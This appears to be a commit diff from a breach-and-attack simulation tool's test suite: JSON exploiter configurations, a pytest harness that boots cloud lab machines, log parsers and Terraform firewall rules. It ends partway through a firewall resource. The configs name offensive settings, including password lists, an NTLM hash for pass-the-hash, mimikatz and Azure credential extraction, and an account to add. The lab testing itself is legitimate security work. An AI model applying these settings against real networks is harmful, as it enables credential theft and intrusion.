"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 60,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,184 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"1234",
"password",
"12345678"
],
"exploit_user_list": [
"Administrator",
"root",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.18",
"10.2.2.19"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"WebLogicExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,190 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"Ivrrw5zEzs"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.14",
"10.2.2.15"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,188 @@
{
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
]
},
"general": {
"should_exploit": true
}
},
"basic_network": {
"general": {
"blocked_ips": [],
"depth": 2,
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.15"
]
},
"network_analysis": {
"inaccessible_subnets": []
}
},
"cnc": {
"servers": {
"command_servers": [
"10.2.2.251:5000"
],
"current_server": "10.2.2.251:5000",
"internet_services": [
"monkey.guardicore.com",
"www.google.com"
]
}
},
"exploits": {
"general": {
"exploiter_classes": [
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
],
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home"
],
"sambacry_shares_not_to_check": [
"IPC$",
"print$"
],
"sambacry_trigger_timeout": 5
},
"smb_service": {
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey"
}
},
"internal": {
"classes": {
"finger_classes": [
"SMBFinger",
"SSHFinger",
"PingScanner",
"HTTPFinger",
"MySQLFinger",
"MSSQLFinger",
"ElasticFinger"
]
},
"dropper": {
"dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true
},
"exploits": {
"exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [ "f7e457346f7743daece17258667c936d" ],
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
"kill_file": {
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not"
},
"logging": {
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
}
},
"monkey": {
"behaviour": {
"PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false,
"use_file_logging": true
},
"general": {
"alive": true,
"post_breach_actions": []
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
80,
8080,
443,
8008,
7001
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
445,
135,
3389,
80,
8080,
443,
8008,
3306,
9200,
7001
]
}
}
}

View File

@ -0,0 +1,38 @@
import os
import logging
from bson import ObjectId
LOGGER = logging.getLogger(__name__)
class MonkeyLog(object):
def __init__(self, monkey, log_dir_path):
self.monkey = monkey
self.log_dir_path = log_dir_path
def download_log(self, island_client):
log = island_client.find_log_in_db({'monkey_id': ObjectId(self.monkey['id'])})
if not log:
LOGGER.error("Log for monkey {} not found".format(self.monkey['ip_addresses'][0]))
return False
else:
self.write_log_to_file(log)
return True
def write_log_to_file(self, log):
with open(self.get_log_path_for_monkey(self.monkey), 'w') as log_file:
log_file.write(MonkeyLog.parse_log(log))
@staticmethod
def parse_log(log):
log = log.strip('"')
log = log.replace("\\n", "\n ")
return log
@staticmethod
def get_filename_for_monkey_log(monkey):
return "{}.txt".format(monkey['ip_addresses'][0])
def get_log_path_for_monkey(self, monkey):
return os.path.join(self.log_dir_path, MonkeyLog.get_filename_for_monkey_log(monkey))

View File

@ -0,0 +1,43 @@
import logging
import re
LOGGER = logging.getLogger(__name__)
class MonkeyLogParser(object):
def __init__(self, log_path):
self.log_path = log_path
self.log_contents = self.read_log()
def read_log(self):
with open(self.log_path, 'r') as log:
return log.read()
def print_errors(self):
errors = MonkeyLogParser.get_errors(self.log_contents)
if len(errors) > 0:
LOGGER.info("Found {} errors:".format(len(errors)))
for index, error_line in enumerate(errors):
LOGGER.info("Err #{}: {}".format(index, error_line))
else:
LOGGER.info("No errors!")
@staticmethod
def get_errors(log_contents):
searcher = re.compile(r"^.*:ERROR].*$", re.MULTILINE)
return searcher.findall(log_contents)
def print_warnings(self):
warnings = MonkeyLogParser.get_warnings(self.log_contents)
if len(warnings) > 0:
LOGGER.info("Found {} warnings:".format(len(warnings)))
for index, warning_line in enumerate(warnings):
LOGGER.info("Warn #{}: {}".format(index, warning_line))
else:
LOGGER.info("No warnings!")
@staticmethod
def get_warnings(log_contents):
searcher = re.compile(r"^.*:WARNING].*$", re.MULTILINE)
return searcher.findall(log_contents)
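
For illustration only, a minimal sketch of driving the parser by hand (the log path is a hypothetical placeholder):

    # Illustrative only -- the path below is hypothetical.
    parser = MonkeyLogParser("./logs/SSH_exploiter_and_keys/10.2.2.11.txt")
    parser.print_errors()    # logs every line containing ":ERROR]"
    parser.print_warnings()  # logs every line containing ":WARNING]"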

View File

@ -0,0 +1,26 @@
import logging
from envs.monkey_zoo.blackbox.log_handlers.monkey_log import MonkeyLog
LOGGER = logging.getLogger(__name__)
class MonkeyLogsDownloader(object):
def __init__(self, island_client, log_dir_path):
self.island_client = island_client
self.log_dir_path = log_dir_path
self.monkey_log_paths = []
def download_monkey_logs(self):
LOGGER.info("Downloading each monkey log.")
all_monkeys = self.island_client.get_all_monkeys_from_db()
for monkey in all_monkeys:
downloaded_log_path = self._download_monkey_log(monkey)
if downloaded_log_path:
self.monkey_log_paths.append(downloaded_log_path)
def _download_monkey_log(self, monkey):
log_handler = MonkeyLog(monkey, self.log_dir_path)
download_successful = log_handler.download_log(self.island_client)
return log_handler.get_log_path_for_monkey(monkey) if download_successful else None

View File

@ -0,0 +1,50 @@
import os
import shutil
import logging
from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser
from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader
LOG_DIR_NAME = 'logs'
LOGGER = logging.getLogger(__name__)
class TestLogsHandler(object):
def __init__(self, test_name, island_client, log_dir_path):
self.test_name = test_name
self.island_client = island_client
self.log_dir_path = os.path.join(log_dir_path, self.test_name)
def parse_test_logs(self):
log_paths = self.download_logs()
if not log_paths:
LOGGER.error("No logs were downloaded. Maybe no monkeys were ran "
"or early exception prevented log download?")
return
TestLogsHandler.parse_logs(log_paths)
def download_logs(self):
self.try_create_log_dir_for_test()
downloader = MonkeyLogsDownloader(self.island_client, self.log_dir_path)
downloader.download_monkey_logs()
return downloader.monkey_log_paths
def try_create_log_dir_for_test(self):
try:
os.mkdir(self.log_dir_path)
except Exception as e:
LOGGER.error("Can't create a dir for test logs: {}".format(e))
@staticmethod
def delete_log_folder_contents(log_dir_path):
shutil.rmtree(log_dir_path, ignore_errors=True)
os.mkdir(log_dir_path)
@staticmethod
def parse_logs(log_paths):
for log_path in log_paths:
LOGGER.info("Info from log at {}".format(log_path))
log_parser = MonkeyLogParser(log_path)
log_parser.print_errors()
log_parser.print_warnings()

View File

@ -0,0 +1,5 @@
[pytest]
log_cli = 1
log_cli_level = INFO
log_cli_format = %(asctime)s [%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s
log_cli_date_format=%H:%M:%S

View File

@ -0,0 +1,2 @@
pytest
unittest

View File

@ -0,0 +1,110 @@
import os
import logging
import pytest
from time import sleep
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHandler
DEFAULT_TIMEOUT_SECONDS = 5*60
MACHINE_BOOTUP_WAIT_SECONDS = 30
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16',
'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10',
'tunneling-11', 'weblogic-18', 'weblogic-19', 'shellshock-8']
LOG_DIR_PATH = "./logs"
LOGGER = logging.getLogger(__name__)
@pytest.fixture(autouse=True, scope='session')
def GCPHandler(request):
GCPHandler = gcp_machine_handlers.GCPHandler()
GCPHandler.start_machines(" ".join(GCP_TEST_MACHINE_LIST))
wait_machine_bootup()
def fin():
GCPHandler.stop_machines(" ".join(GCP_TEST_MACHINE_LIST))
request.addfinalizer(fin)
@pytest.fixture(autouse=True, scope='session')
def delete_logs():
LOGGER.info("Deleting monkey logs before new tests.")
TestLogsHandler.delete_log_folder_contents(TestMonkeyBlackbox.get_log_dir_path())
def wait_machine_bootup():
sleep(MACHINE_BOOTUP_WAIT_SECONDS)
@pytest.fixture(scope='class')
def island_client(island):
island_client_object = MonkeyIslandClient(island)
island_client_object.reset_env()
yield island_client_object
@pytest.mark.usefixtures('island_client')
# noinspection PyUnresolvedReferences
class TestMonkeyBlackbox(object):
@staticmethod
def run_basic_test(island_client, conf_filename, test_name, timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS):
config_parser = IslandConfigParser(conf_filename)
analyzer = CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
BasicTest(test_name,
island_client,
config_parser,
[analyzer],
timeout_in_seconds,
log_handler).run()
@staticmethod
def get_log_dir_path():
return os.path.abspath(LOG_DIR_PATH)
def test_server_online(self, island_client):
assert island_client.get_api_status() is not None
def test_ssh_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SSH.conf", "SSH_exploiter_and_keys")
def test_hadoop_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "HADOOP.conf", "Hadoop_exploiter", 6*60)
def test_mssql_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "MSSQL.conf", "MSSQL_exploiter")
def test_smb_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SMB_MIMIKATZ.conf", "SMB_exploiter_mimikatz")
def test_smb_pth(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SMB_PTH.conf", "SMB_PTH")
def test_elastic_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "ELASTIC.conf", "Elastic_exploiter")
def test_struts_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "STRUTS2.conf", "Strtuts2_exploiter")
def test_weblogic_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WEBLOGIC.conf", "Weblogic_exploiter")
def test_shellshock_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SHELLSHOCK.conf", "Shellschock_exploiter")
@pytest.mark.xfail(reason="Test fails randomly - still investigating.")
def test_tunneling(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "TUNNELING.conf", "Tunneling_exploiter", 10*60)
def test_wmi_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WMI_MIMIKATZ.conf", "WMI_exploiter,_mimikatz")
def test_wmi_pth(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WMI_PTH.conf", "WMI_PTH")

View File

@ -0,0 +1,98 @@
import json
from time import sleep
import logging
from envs.monkey_zoo.blackbox.utils.test_timer import TestTimer
MAX_TIME_FOR_MONKEYS_TO_DIE = 5 * 60
WAIT_TIME_BETWEEN_REQUESTS = 10
TIME_FOR_MONKEY_PROCESS_TO_FINISH = 40
DELAY_BETWEEN_ANALYSIS = 3
LOGGER = logging.getLogger(__name__)
class BasicTest(object):
def __init__(self, name, island_client, config_parser, analyzers, timeout, log_handler):
self.name = name
self.island_client = island_client
self.config_parser = config_parser
self.analyzers = analyzers
self.timeout = timeout
self.log_handler = log_handler
def run(self):
LOGGER.info("Uploading configuration:\n{}".format(json.dumps(self.config_parser.config_json, indent=2)))
self.island_client.import_config(self.config_parser.config_raw)
self.print_test_starting_info()
try:
self.island_client.run_monkey_local()
self.test_until_timeout()
finally:
self.island_client.kill_all_monkeys()
self.wait_until_monkeys_die()
self.wait_for_monkey_process_to_finish()
self.parse_logs()
self.island_client.reset_env()
def print_test_starting_info(self):
LOGGER.info("Started {} test".format(self.name))
LOGGER.info("Machines participating in test:")
LOGGER.info(" ".join(self.config_parser.get_ips_of_targets()))
print("")
def test_until_timeout(self):
timer = TestTimer(self.timeout)
while not timer.is_timed_out():
if self.all_analyzers_pass():
self.log_success(timer)
return
sleep(DELAY_BETWEEN_ANALYSIS)
LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()))
self.log_failure(timer)
assert False
def log_success(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()))
def log_failure(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name,
timer.get_time_taken()))
def all_analyzers_pass(self):
for analyzer in self.analyzers:
if not analyzer.analyze_test_results():
return False
return True
def get_analyzer_logs(self):
log = ""
for analyzer in self.analyzers:
log += "\n" + analyzer.log.get_contents()
return log
def wait_until_monkeys_die(self):
time_passed = 0
while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE:
sleep(WAIT_TIME_BETWEEN_REQUESTS)
time_passed += WAIT_TIME_BETWEEN_REQUESTS
LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed))
if time_passed >= MAX_TIME_FOR_MONKEYS_TO_DIE:
LOGGER.error("Some monkeys didn't die after the test, failing")
assert False
def parse_logs(self):
LOGGER.info("Parsing test logs:")
self.log_handler.parse_test_logs()
@staticmethod
def wait_for_monkey_process_to_finish():
"""
There is a time period when the monkey is marked as dead but its process is still shutting down.
If we try to launch a monkey during that window, it will fail to start, which is why the test
needs to wait a bit even after all monkeys are reported dead.
"""
sleep(TIME_FOR_MONKEY_PROCESS_TO_FINISH)

View File

@ -0,0 +1,54 @@
import subprocess
import logging
LOGGER = logging.getLogger(__name__)
class GCPHandler(object):
AUTHENTICATION_COMMAND = "gcloud auth activate-service-account --key-file=%s"
SET_PROPERTY_PROJECT = "gcloud config set project %s"
MACHINE_STARTING_COMMAND = "gcloud compute instances start %s --zone=%s"
MACHINE_STOPPING_COMMAND = "gcloud compute instances stop %s --zone=%s"
def __init__(self, key_path="../gcp_keys/gcp_key.json", zone="europe-west3-a", project_id="guardicore-22050661"):
self.zone = zone
try:
# pass the key file to gcp
subprocess.call(GCPHandler.get_auth_command(key_path), shell=True)
LOGGER.info("GCP Handler passed key")
# set project
subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True)
LOGGER.info("GCP Handler set project")
LOGGER.info("GCP Handler initialized successfully")
except Exception as e:
LOGGER.error("GCP Handler failed to initialize: %s." % e)
def start_machines(self, machine_list):
"""
Start all the machines in the list.
:param machine_list: A space-separated string with all the machine names. Example:
start_machines(`" ".join(["elastic-3", "mssql-16"])`)
"""
LOGGER.info("Setting up all GCP machines...")
try:
subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True)
LOGGER.info("GCP machines successfully started.")
except Exception as e:
LOGGER.error("GCP Handler failed to start GCP machines: %s" % e)
def stop_machines(self, machine_list):
try:
subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True)
LOGGER.info("GCP machines stopped successfully.")
except Exception as e:
LOGGER.error("GCP Handler failed to stop network machines: %s" % e)
@staticmethod
def get_auth_command(key_path):
return GCPHandler.AUTHENTICATION_COMMAND % key_path
@staticmethod
def get_set_project_command(project):
return GCPHandler.SET_PROPERTY_PROJECT % project
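
A hedged usage sketch of the handler above; the key path is simply the constructor default, and the machine names are assumptions borrowed from the blackbox test machine list:

    # Illustrative only: bring two zoo machines up, then shut them down again.
    handler = GCPHandler(key_path="../gcp_keys/gcp_key.json")
    handler.start_machines(" ".join(["hadoop-2", "mssql-16"]))
    # ... run blackbox tests here ...
    handler.stop_machines(" ".join(["hadoop-2", "mssql-16"]))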

View File

@ -0,0 +1,9 @@
import json
from bson import ObjectId
class MongoQueryJSONEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, ObjectId):
return str(o)
return json.JSONEncoder.default(self, o)
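
A minimal sketch of how the encoder is wired in: it plugs into json.dumps through the standard cls parameter, so ObjectId values coming back from Mongo queries serialize as plain strings. The document below is invented purely for illustration:

    # Illustrative only -- the dict is made up; the cls= wiring is the point.
    doc = {'monkey_id': ObjectId('5db1afc0e4b0c1a2b3c4d5e6'), 'ip': '10.2.2.11'}
    print(json.dumps(doc, cls=MongoQueryJSONEncoder))
    # -> e.g. {"monkey_id": "5db1afc0e4b0c1a2b3c4d5e6", "ip": "10.2.2.11"}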

View File

@ -0,0 +1,17 @@
from time import time
class TestTimer(object):
def __init__(self, timeout):
self.timeout_time = TestTimer.get_timeout_time(timeout)
self.start_time = time()
def is_timed_out(self):
return time() > self.timeout_time
def get_time_taken(self):
return time() - self.start_time
@staticmethod
def get_timeout_time(timeout):
return time() + timeout

File diff suppressed because it is too large.

Binary file not shown (image, 225 KiB).

4
envs/monkey_zoo/gcp_keys/.gitignore vendored Normal file
View File

@ -0,0 +1,4 @@
# Ignore everything in this directory
*
# Except this file
!.gitignore

View File

@ -0,0 +1,11 @@
provider "google" {
project = "test-000000"
region = "europe-west3"
zone = "europe-west3-b"
credentials = "${file("../gcp_keys/gcp_key.json")}"
}
locals {
resource_prefix = ""
service_account_email="tester-monkeyZoo-user@testproject-000000.iam.gserviceaccount.com"
monkeyzoo_project="guardicore-22050661"
}

View File

@ -0,0 +1,100 @@
resource "google_compute_firewall" "islands-in" {
name = "${local.resource_prefix}islands-in"
network = "${google_compute_network.monkeyzoo.name}"
allow {
protocol = "tcp"
ports = ["22", "443", "3389", "5000"]
}
direction = "INGRESS"
priority = "65534"
target_tags = ["island"]
}
resource "google_compute_firewall" "islands-out" {
name = "${local.resource_prefix}islands-out"
network = "${google_compute_network.monkeyzoo.name}"
allow {
protocol = "tcp"
}
direction = "EGRESS"
priority = "65534"
target_tags = ["island"]
}
resource "google_compute_firewall" "monkeyzoo-in" {
name = "${local.resource_prefix}monkeyzoo-in"
network = "${google_compute_network.monkeyzoo.name}"
allow {
protocol = "all"
}
direction = "INGRESS"
priority = "65534"
source_ranges = ["10.2.2.0/24"]
}
resource "google_compute_firewall" "monkeyzoo-out" {
name = "${local.resource_prefix}monkeyzoo-out"
network = "${google_compute_network.monkeyzoo.name}"
allow {
protocol = "all"
}
direction = "EGRESS"
priority = "65534"
destination_ranges = ["10.2.2.0/24"]
}
resource "google_compute_firewall" "tunneling-in" {
name = "${local.resource_prefix}tunneling-in"
network = "${google_compute_network.tunneling.name}"
allow {
protocol = "all"
}
direction = "INGRESS"
source_ranges = ["10.2.1.0/24"]
}
resource "google_compute_firewall" "tunneling-out" {
name = "${local.resource_prefix}tunneling-out"
network = "${google_compute_network.tunneling.name}"
allow {
protocol = "all"
}
direction = "EGRESS"
destination_ranges = ["10.2.1.0/24"]
}
resource "google_compute_firewall" "tunneling2-in" {
